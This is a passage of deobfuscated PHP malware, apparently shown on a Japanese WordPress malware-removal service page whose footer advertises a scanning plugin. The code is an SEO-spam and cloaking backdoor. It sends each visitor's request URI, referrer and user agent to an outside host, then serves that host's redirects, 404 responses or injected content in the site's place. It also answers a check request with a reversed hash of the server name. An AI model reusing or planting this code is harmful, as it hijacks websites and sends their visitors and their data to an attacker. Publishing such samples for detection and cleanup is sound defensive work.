$uhUyM["sn"] = uTOVz($_SERVER["SCRIPT_NAME"]);
$uhUyM["r"] = uToVz($_SERVER["REQUEST_URI"]);
$uhUyM["rf"] = utoVZ($X5nhk);
$uhUyM["s"] = utoVZ($j73v5);
$uhUyM["u"] = Utovz($_SERVER["HTTP_USER_AGENT"]);
$o20y7 = preg_replace("/\\?.*/", '', $_SERVER["REQUEST_URI"]);
$Fo5vH = false;
if (!(strpos($o20y7, ".") > 0 && strpos($o20y7, ".php") === false)) {
goto vov1r;
}
$TIcw3 = substr($o20y7, strpos($o20y7, "."));
if (!in_array($TIcw3, array(".js", ".css", ".jpg", ".png", ".gif", ".ico"))) {
goto TbCm9;
}
$Fo5vH = true;
TbCm9:
vov1r:
if ($Fo5vH) {
goto Tgbrn;
}
$a8n_D = V7QaF("http://zs255v13qo.calwise.boats/", $uhUyM);
if (in_array($a8n_D["status"], array(0, 200))) {
goto ruwLp;
}
switch ($a8n_D["status"]) {
case 301:
header("HTTP/1.1 301 Moved Permanently");
header("Location: " . trim($a8n_D["content"]));
goto GKBV4;
case 302:
header("HTTP/1.1 302 Move Temporarily");
header("Location: " . trim($a8n_D["content"]));
goto GKBV4;
case 404:
header("HTTP/1.1 404 Not Found");
header("status: 404 Not Found");
goto GKBV4;
default:
goto GKBV4;
}
GKBV4:
ruwLp:
if (!strlen($a8n_D["content"])) {
Tgbrn:
// [PHPDeobfuscator] Implied script end
return;
}
@header("Content-Type:" . $a8n_D["type"]);
echo $a8n_D["content"];
exit(0);
}
exit("{ \"error\": 200, \"lc\": \"jk\", \"data\": [ 1 ] }");
}
exit(strrev(md5($_SERVER["SERVER_NAME"])));■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]
■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります
(C)2019 ワードプレス ドクター All rights reserved.